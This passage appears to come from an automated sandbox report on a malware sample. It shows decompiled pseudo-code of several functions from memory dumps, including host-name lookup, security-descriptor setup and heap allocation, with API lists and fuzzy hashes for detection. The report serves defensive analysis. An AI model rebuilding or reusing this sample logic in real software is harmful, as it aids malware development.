                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                          					_t26 = lstrlenW( *0x404138);
                                                                                                                                                                                                                                          					_t8 = _t26 + 2; // 0x2
                                                                                                                                                                                                                                          					_t44 = _t26 + _t8;
                                                                                                                                                                                                                                          					_t11 = _t44 + 8; // 0xa
                                                                                                                                                                                                                                          					_t30 = E004010FC(_t39, _t11,  &_v32,  &_v36); // executed
                                                                                                                                                                                                                                          					if(_t30 == 0) {
                                                                                                                                                                                                                                          						_t37 = _v36;
                                                                                                                                                                                                                                          						 *_t37 = _t30;
                                                                                                                                                                                                                                          						_t32 =  *0x404138;
                                                                                                                                                                                                                                          						if(_t32 == 0) {
                                                                                                                                                                                                                                          							 *(_t37 + 4) = 0;
                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                          							memcpy(_t37 + 4, _t32, _t44);
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					_t25 = E00401ADC(_v28); // executed
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				ExitThread(_t25);
                                                                                                                                                                                                                                          			}

















                                                                                                                                                                                                                                          0x004016ea
                                                                                                                                                                                                                                          0x004016fb
                                                                                                                                                                                                                                          0x00401705
                                                                                                                                                                                                                                          0x004016fd
                                                                                                                                                                                                                                          0x004016fd
                                                                                                                                                                                                                                          0x004016fd
                                                                                                                                                                                                                                          0x0040170c
                                                                                                                                                                                                                                          0x00401715
                                                                                                                                                                                                                                          0x0040171a
                                                                                                                                                                                                                                          0x00401738
                                                                                                                                                                                                                                          0x00401793
                                                                                                                                                                                                                                          0x0040173a
                                                                                                                                                                                                                                          0x00401740
                                                                                                                                                                                                                                          0x00401746
                                                                                                                                                                                                                                          0x00401746
                                                                                                                                                                                                                                          0x00401754
                                                                                                                                                                                                                                          0x00401758
                                                                                                                                                                                                                                          0x0040175f
                                                                                                                                                                                                                                          0x00401761
                                                                                                                                                                                                                                          0x00401765
                                                                                                                                                                                                                                          0x00401767
                                                                                                                                                                                                                                          0x0040176e
                                                                                                                                                                                                                                          0x00401782
                                                                                                                                                                                                                                          0x00401770
                                                                                                                                                                                                                                          0x00401776
                                                                                                                                                                                                                                          0x0040177b
                                                                                                                                                                                                                                          0x0040176e
                                                                                                                                                                                                                                          0x0040178a
                                                                                                                                                                                                                                          0x0040178a
                                                                                                                                                                                                                                          0x00401795

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.600128406.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.600165940.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.600183229.0000000000407000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExitThreadlstrlenmemcpy
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3726537860-0
                                                                                                                                                                                                                                          • Opcode ID: 91ba1139c3755cad229bb9d0445754134c7e8b55493b0356f5d3d0d93ac96fa6
                                                                                                                                                                                                                                          • Instruction ID: 8a4fee98c5b033481079d20f2ed09bf24140ca87285630fc1cd12ba5e166c3f8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 91ba1139c3755cad229bb9d0445754134c7e8b55493b0356f5d3d0d93ac96fa6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA11BEB1504205ABD710DB61CE88E9777ECAB48354F00083AF645F71B1EB38E5498B9A
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          C-Code - Quality: 44%
                                                                                                                                                                                                                                          			E01121EC4(void* __eax, char _a4) {
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				 *0x112d2b0 =  *0x112d2b0 & 0x00000000;
                                                                                                                                                                                                                                          				_push(0);
                                                                                                                                                                                                                                          				_push(0x112d2ac);
                                                                                                                                                                                                                                          				_push(1);
                                                                                                                                                                                                                                          				_t1 =  &_a4; // 0x4d283a53
                                                                                                                                                                                                                                          				_push( *_t1);
                                                                                                                                                                                                                                          				 *0x112d2a8 = 0xc; // executed
                                                                                                                                                                                                                                          				L011269E2(); // executed
                                                                                                                                                                                                                                          				return __eax;
                                                                                                                                                                                                                                          			}



                                                                                                                                                                                                                                          0x01121ec4
                                                                                                                                                                                                                                          0x01121ecb
                                                                                                                                                                                                                                          0x01121ecd
                                                                                                                                                                                                                                          0x01121ed2
                                                                                                                                                                                                                                          0x01121ed4
                                                                                                                                                                                                                                          0x01121ed4
                                                                                                                                                                                                                                          0x01121ed8
                                                                                                                                                                                                                                          0x01121ee2
                                                                                                                                                                                                                                          0x01121ee7

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(S:(M,00000001,0112D2AC,00000000), ref: 01121EE2
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.601524786.0000000001121000.00000020.00000001.sdmp, Offset: 01120000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601513093.0000000001120000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601557787.000000000112C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601573692.000000000112D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601594857.000000000112F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DescriptorSecurity$ConvertString
                                                                                                                                                                                                                                          • String ID: S:(M
                                                                                                                                                                                                                                          • API String ID: 3907675253-2217774225
                                                                                                                                                                                                                                          • Opcode ID: ebde7308d97c251afe19f09e38fb1926a7746aee41cfbb1d39be904ef8150c84
                                                                                                                                                                                                                                          • Instruction ID: 0e9ffeb337467e2ae66d22fcc9d9c7c501342f1e9a304f887ec72258bbc97045
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ebde7308d97c251afe19f09e38fb1926a7746aee41cfbb1d39be904ef8150c84
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 75C08C74240300BEEE38AF80EC42F027650B312724F200118F110200C0C3F080B48716
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          C-Code - Quality: 75%
                                                                                                                                                                                                                                          			E0112642C(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                                                                                                                                                                                                                                          				void* _v8;
                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                          				intOrPtr* _t35;
                                                                                                                                                                                                                                          				intOrPtr* _t41;
                                                                                                                                                                                                                                          				intOrPtr* _t43;
                                                                                                                                                                                                                                          				intOrPtr* _t45;
                                                                                                                                                                                                                                          				intOrPtr* _t50;
                                                                                                                                                                                                                                          				intOrPtr* _t52;
                                                                                                                                                                                                                                          				void* _t54;
                                                                                                                                                                                                                                          				intOrPtr* _t55;
                                                                                                                                                                                                                                          				intOrPtr* _t57;
                                                                                                                                                                                                                                          				intOrPtr* _t61;
                                                                                                                                                                                                                                          				intOrPtr* _t65;
                                                                                                                                                                                                                                          				intOrPtr _t68;
                                                                                                                                                                                                                                          				void* _t72;
                                                                                                                                                                                                                                          				void* _t75;
                                                                                                                                                                                                                                          				void* _t76;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				_t55 = _a4;
                                                                                                                                                                                                                                          				_t35 =  *((intOrPtr*)(_t55 + 4));
                                                                                                                                                                                                                                          				_a4 = 0;
                                                                                                                                                                                                                                          				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                                                                                                                                                                                                                                          				if(_t76 < 0) {
                                                                                                                                                                                                                                          					L18:
                                                                                                                                                                                                                                          					return _t76;
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				_t76 = E01124FFA(_v8, _a8, _a12, _a20,  &_a20,  &_a12);
                                                                                                                                                                                                                                          				if(_t76 >= 0) {
                                                                                                                                                                                                                                          					_t61 = _a28;
                                                                                                                                                                                                                                          					if(_t61 != 0 &&  *_t61 != 0) {
                                                                                                                                                                                                                                          						_t52 = _v8;
                                                                                                                                                                                                                                          						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					if(_t76 >= 0) {
                                                                                                                                                                                                                                          						_t43 =  *_t55;
                                                                                                                                                                                                                                          						_t68 =  *0x112d2a4; // 0x451a5a8
                                                                                                                                                                                                                                          						_t20 = _t68 + 0x112e1fc; // 0x740053
                                                                                                                                                                                                                                          						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                                                                                                                                                                                                                                          						if(_t76 >= 0) {
                                                                                                                                                                                                                                          							_t76 = E01125103(_a4);
                                                                                                                                                                                                                                          							if(_t76 >= 0) {
                                                                                                                                                                                                                                          								_t65 = _a28;
                                                                                                                                                                                                                                          								if(_t65 != 0 &&  *_t65 == 0) {
                                                                                                                                                                                                                                          									_t50 = _a4;
                                                                                                                                                                                                                                          									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						_t45 = _a4;
                                                                                                                                                                                                                                          						if(_t45 != 0) {
                                                                                                                                                                                                                                          							 *((intOrPtr*)( *_t45 + 8))(_t45);
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						_t57 = __imp__#6;
                                                                                                                                                                                                                                          						if(_a20 != 0) {
                                                                                                                                                                                                                                          							 *_t57(_a20);
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						if(_a12 != 0) {
                                                                                                                                                                                                                                          							 *_t57(_a12);
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				_t41 = _v8;
                                                                                                                                                                                                                                          				 *((intOrPtr*)( *_t41 + 8))(_t41);
                                                                                                                                                                                                                                          				goto L18;
                                                                                                                                                                                                                                          			}




















                                                                                                                                                                                                                                          0x01126432
                                                                                                                                                                                                                                          0x01126435
                                                                                                                                                                                                                                          0x01126445
                                                                                                                                                                                                                                          0x0112644e
                                                                                                                                                                                                                                          0x01126452
                                                                                                                                                                                                                                          0x01126520
                                                                                                                                                                                                                                          0x01126526
                                                                                                                                                                                                                                          0x01126526
                                                                                                                                                                                                                                          0x01126471
                                                                                                                                                                                                                                          0x01126475
                                                                                                                                                                                                                                          0x0112647b
                                                                                                                                                                                                                                          0x01126480
                                                                                                                                                                                                                                          0x01126487
                                                                                                                                                                                                                                          0x01126496
                                                                                                                                                                                                                                          0x01126496
                                                                                                                                                                                                                                          0x0112649a
                                                                                                                                                                                                                                          0x0112649c
                                                                                                                                                                                                                                          0x011264a8
                                                                                                                                                                                                                                          0x011264b3
                                                                                                                                                                                                                                          0x011264be
                                                                                                                                                                                                                                          0x011264c2
                                                                                                                                                                                                                                          0x011264cc
                                                                                                                                                                                                                                          0x011264d0
                                                                                                                                                                                                                                          0x011264d2
                                                                                                                                                                                                                                          0x011264d7
                                                                                                                                                                                                                                          0x011264de
                                                                                                                                                                                                                                          0x011264ee
                                                                                                                                                                                                                                          0x011264ee
                                                                                                                                                                                                                                          0x011264d7
                                                                                                                                                                                                                                          0x011264d0
                                                                                                                                                                                                                                          0x011264f0
                                                                                                                                                                                                                                          0x011264f5
                                                                                                                                                                                                                                          0x011264fa
                                                                                                                                                                                                                                          0x011264fa
                                                                                                                                                                                                                                          0x011264fd
                                                                                                                                                                                                                                          0x01126506
                                                                                                                                                                                                                                          0x0112650b
                                                                                                                                                                                                                                          0x0112650b
                                                                                                                                                                                                                                          0x01126510
                                                                                                                                                                                                                                          0x01126515
                                                                                                                                                                                                                                          0x01126515
                                                                                                                                                                                                                                          0x01126510
                                                                                                                                                                                                                                          0x0112649a
                                                                                                                                                                                                                                          0x01126517
                                                                                                                                                                                                                                          0x0112651d
                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 01124FFA: SysAllocString.OLEAUT32(80000002), ref: 01125057
                                                                                                                                                                                                                                            • Part of subcall function 01124FFA: SysFreeString.OLEAUT32(00000000), ref: 011250BD
                                                                                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 0112650B
                                                                                                                                                                                                                                          • SysFreeString.OLEAUT32(0112A6F4), ref: 01126515
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.601524786.0000000001121000.00000020.00000001.sdmp, Offset: 01120000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601513093.0000000001120000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601557787.000000000112C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601573692.000000000112D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601594857.000000000112F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: String$Free$Alloc
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 986138563-0
                                                                                                                                                                                                                                          • Opcode ID: 270159476d26f4b122e83c42a94caa016e28f8ee4ddf93946f2237ee6cceef32
                                                                                                                                                                                                                                          • Instruction ID: 0a5c3e194e2f88705cd37784fc295938d793f1512ef3fafef9f669e87ab17fe3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 270159476d26f4b122e83c42a94caa016e28f8ee4ddf93946f2237ee6cceef32
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 123159715001A9AFCB25DF68C888C9BBB7AFFC96447104658FD059B254E331EDA1CBA0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          C-Code - Quality: 37%
                                                                                                                                                                                                                                          			E011273E9(void* __ecx) {
                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                          				void* _t15;
                                                                                                                                                                                                                                          				void* _t19;
                                                                                                                                                                                                                                          				void* _t20;
                                                                                                                                                                                                                                          				void* _t22;
                                                                                                                                                                                                                                          				intOrPtr* _t23;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				_t23 = __imp__;
                                                                                                                                                                                                                                          				_t20 = 0;
                                                                                                                                                                                                                                          				_v8 = _v8 & 0;
                                                                                                                                                                                                                                          				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
                                                                                                                                                                                                                                          				_t10 = _v8;
                                                                                                                                                                                                                                          				if(_v8 != 0) {
                                                                                                                                                                                                                                          					_t20 = E011258BE(_t10 + 1);
                                                                                                                                                                                                                                          					if(_t20 != 0) {
                                                                                                                                                                                                                                          						_t15 =  *_t23(3, _t20,  &_v8); // executed
                                                                                                                                                                                                                                          						if(_t15 != 0) {
                                                                                                                                                                                                                                          							 *((char*)(_v8 + _t20)) = 0;
                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                          							E0112147E(_t20);
                                                                                                                                                                                                                                          							_t20 = 0;
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				return _t20;
                                                                                                                                                                                                                                          			}









                                                                                                                                                                                                                                          0x011273ee
                                                                                                                                                                                                                                          0x011273f9
                                                                                                                                                                                                                                          0x011273fb
                                                                                                                                                                                                                                          0x01127401
                                                                                                                                                                                                                                          0x01127403
                                                                                                                                                                                                                                          0x01127408
                                                                                                                                                                                                                                          0x01127411
                                                                                                                                                                                                                                          0x01127415
                                                                                                                                                                                                                                          0x0112741e
                                                                                                                                                                                                                                          0x01127422
                                                                                                                                                                                                                                          0x01127431
                                                                                                                                                                                                                                          0x01127424
                                                                                                                                                                                                                                          0x01127425
                                                                                                                                                                                                                                          0x0112742a
                                                                                                                                                                                                                                          0x0112742a
                                                                                                                                                                                                                                          0x01127422
                                                                                                                                                                                                                                          0x01127415
                                                                                                                                                                                                                                          0x0112743a

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetComputerNameExA.KERNELBASE(00000003,00000000,011251DC,7519F710,00000000,?,?,011251DC), ref: 01127401
                                                                                                                                                                                                                                            • Part of subcall function 011258BE: RtlAllocateHeap.NTDLL(00000000,-00000008,01121C51), ref: 011258CA
                                                                                                                                                                                                                                          • GetComputerNameExA.KERNELBASE(00000003,00000000,011251DC,011251DD,?,?,011251DC), ref: 0112741E
                                                                                                                                                                                                                                            • Part of subcall function 0112147E: HeapFree.KERNEL32(00000000,00000000,01121D11,00000000,?,?,-00000008), ref: 0112148A
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.601524786.0000000001121000.00000020.00000001.sdmp, Offset: 01120000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601513093.0000000001120000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601557787.000000000112C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601573692.000000000112D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601594857.000000000112F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ComputerHeapName$AllocateFree
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 187446995-0
                                                                                                                                                                                                                                          • Opcode ID: 3b225cb28029881155f6947957de5ec8b1e9d7f699ecd1e61ceb930f91cb2467
                                                                                                                                                                                                                                          • Instruction ID: a0dfda96e435d43947c2bb7f0d1a68ff6310aa8a35744b97c303e16db610a8a1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3b225cb28029881155f6947957de5ec8b1e9d7f699ecd1e61ceb930f91cb2467
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FBF0B4266001A9BAE725DBBA8C00EAF7ABDDBD5640F210069E904D3140EB74DF1187B0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          C-Code - Quality: 34%
                                                                                                                                                                                                                                          			E01127BA9(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                                          				void* _v18;
                                                                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                                                                          				intOrPtr _t15;
                                                                                                                                                                                                                                          				void* _t17;
                                                                                                                                                                                                                                          				intOrPtr _t19;
                                                                                                                                                                                                                                          				void* _t23;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				_v20 = 0;
                                                                                                                                                                                                                                          				asm("stosd");
                                                                                                                                                                                                                                          				asm("stosd");
                                                                                                                                                                                                                                          				asm("stosd");
                                                                                                                                                                                                                                          				asm("stosw");
                                                                                                                                                                                                                                          				_t15 =  *0x112d2a4; // 0x451a5a8
                                                                                                                                                                                                                                          				_t4 = _t15 + 0x112e39c; // 0x5648944
                                                                                                                                                                                                                                          				_t20 = _t4;
                                                                                                                                                                                                                                          				_t6 = _t15 + 0x112e124; // 0x650047
                                                                                                                                                                                                                                          				_t17 = E0112642C(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
                                                                                                                                                                                                                                          				if(_t17 < 0) {
                                                                                                                                                                                                                                          					_t23 = _t17;
                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                          					_t23 = 8;
                                                                                                                                                                                                                                          					if(_v20 != _t23) {
                                                                                                                                                                                                                                          						_t23 = 1;
                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                          						_t19 = E01124CD3(_t20, _v12);
                                                                                                                                                                                                                                          						if(_t19 != 0) {
                                                                                                                                                                                                                                          							 *_a16 = _t19;
                                                                                                                                                                                                                                          							_t23 = 0;
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						__imp__#6(_v12);
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				return _t23;
                                                                                                                                                                                                                                          			}










                                                                                                                                                                                                                                          0x01127bb3
                                                                                                                                                                                                                                          0x01127bba
                                                                                                                                                                                                                                          0x01127bbb
                                                                                                                                                                                                                                          0x01127bbc
                                                                                                                                                                                                                                          0x01127bbd
                                                                                                                                                                                                                                          0x01127bc3
                                                                                                                                                                                                                                          0x01127bc8
                                                                                                                                                                                                                                          0x01127bc8
                                                                                                                                                                                                                                          0x01127bd2
                                                                                                                                                                                                                                          0x01127be4
                                                                                                                                                                                                                                          0x01127beb
                                                                                                                                                                                                                                          0x01127c19
                                                                                                                                                                                                                                          0x01127bed
                                                                                                                                                                                                                                          0x01127bef
                                                                                                                                                                                                                                          0x01127bf4
                                                                                                                                                                                                                                          0x01127c16
                                                                                                                                                                                                                                          0x01127bf6
                                                                                                                                                                                                                                          0x01127bf9
                                                                                                                                                                                                                                          0x01127c00
                                                                                                                                                                                                                                          0x01127c05
                                                                                                                                                                                                                                          0x01127c07
                                                                                                                                                                                                                                          0x01127c07
                                                                                                                                                                                                                                          0x01127c0c
                                                                                                                                                                                                                                          0x01127c0c
                                                                                                                                                                                                                                          0x01127bf4
                                                                                                                                                                                                                                          0x01127c20

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0112642C: SysFreeString.OLEAUT32(?), ref: 0112650B
                                                                                                                                                                                                                                            • Part of subcall function 01124CD3: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,0112358E,004F0053,00000000,?), ref: 01124CDC
                                                                                                                                                                                                                                            • Part of subcall function 01124CD3: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,0112358E,004F0053,00000000,?), ref: 01124D06
                                                                                                                                                                                                                                            • Part of subcall function 01124CD3: memset.NTDLL ref: 01124D1A
                                                                                                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 01127C0C
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.601524786.0000000001121000.00000020.00000001.sdmp, Offset: 01120000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601513093.0000000001120000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601557787.000000000112C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601573692.000000000112D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601594857.000000000112F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FreeString$lstrlenmemcpymemset
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 397948122-0
                                                                                                                                                                                                                                          • Opcode ID: 99893030f532370fa888aa20cab32882c5bfb1c7eb05d7feeb3dda621f1004d3
                                                                                                                                                                                                                                          • Instruction ID: c58b62557910866e060b1144342d0bd92b73291e9131279818ae43337047c3a2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 99893030f532370fa888aa20cab32882c5bfb1c7eb05d7feeb3dda621f1004d3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EA015E3150012BBFDB1A9FB8DD04AABBBB9EB14254F010435EA05A71A1E7719972C791
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          C-Code - Quality: 37%
                                                                                                                                                                                                                                          			E00401000(void* __eax, intOrPtr _a4) {
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				 *0x404150 =  *0x404150 & 0x00000000;
                                                                                                                                                                                                                                          				_push(0);
                                                                                                                                                                                                                                          				_push(0x40414c);
                                                                                                                                                                                                                                          				_push(1);
                                                                                                                                                                                                                                          				_push(_a4);
                                                                                                                                                                                                                                          				 *0x404148 = 0xc; // executed
                                                                                                                                                                                                                                          				L004011CE(); // executed
                                                                                                                                                                                                                                          				return __eax;
                                                                                                                                                                                                                                          			}



                                                                                                                                                                                                                                          0x00401000
                                                                                                                                                                                                                                          0x00401007
                                                                                                                                                                                                                                          0x00401009
                                                                                                                                                                                                                                          0x0040100e
                                                                                                                                                                                                                                          0x00401010
                                                                                                                                                                                                                                          0x00401014
                                                                                                                                                                                                                                          0x0040101e
                                                                                                                                                                                                                                          0x00401023

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(00401711,00000001,0040414C,00000000), ref: 0040101E
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.600128406.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.600165940.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.600183229.0000000000407000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DescriptorSecurity$ConvertString
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3907675253-0
                                                                                                                                                                                                                                          • Opcode ID: 1398a2d7d33c37d288d581c0a9d4a1d94106b0c1403ca33d02dd1543a610cd86
                                                                                                                                                                                                                                          • Instruction ID: 6ca9f4561cfec6fb12a455dc8c2015ed6cdcf3fe680898d61d6bd483d8d3de7a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1398a2d7d33c37d288d581c0a9d4a1d94106b0c1403ca33d02dd1543a610cd86
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BAC04CF4251340A6E620AF409D4EF457A9177E4B05F210529B3103D1E193FA1094851D
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                          			E011258BE(long _a4) {
                                                                                                                                                                                                                                          				void* _t2;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				_t2 = RtlAllocateHeap( *0x112d238, 0, _a4); // executed
                                                                                                                                                                                                                                          				return _t2;
                                                                                                                                                                                                                                          			}




                                                                                                                                                                                                                                          0x011258ca
                                                                                                                                                                                                                                          0x011258d0

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,-00000008,01121C51), ref: 011258CA
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.601524786.0000000001121000.00000020.00000001.sdmp, Offset: 01120000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601513093.0000000001120000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601557787.000000000112C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601573692.000000000112D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601594857.000000000112F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                                                          • Opcode ID: e92f818111576aca3c31c305aafb2f4bb4424a7defe6c7cae4d0744cf141f09c
                                                                                                                                                                                                                                          • Instruction ID: db46162eb4606b96b9fd1619c4f47ed74d40f0925cc05ac81686930fe9e992f7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e92f818111576aca3c31c305aafb2f4bb4424a7defe6c7cae4d0744cf141f09c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EBB01235000100FBCE354F40ED08F09BB21AB51700F018030F31004078873144B0EB19
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          C-Code - Quality: 84%
                                                                                                                                                                                                                                          			E00401ADC(void* __eax) {
                                                                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                          				void* _t17;
                                                                                                                                                                                                                                          				long _t25;
                                                                                                                                                                                                                                          				long _t28;
                                                                                                                                                                                                                                          				intOrPtr* _t33;
                                                                                                                                                                                                                                          				void* _t34;
                                                                                                                                                                                                                                          				intOrPtr* _t35;
                                                                                                                                                                                                                                          				intOrPtr _t37;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				_t34 = __eax;
                                                                                                                                                                                                                                          				_t17 = E00401F61( &_v8,  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) + 0x00000fff & 0xfffff000,  &_v8,  &_v12); // executed
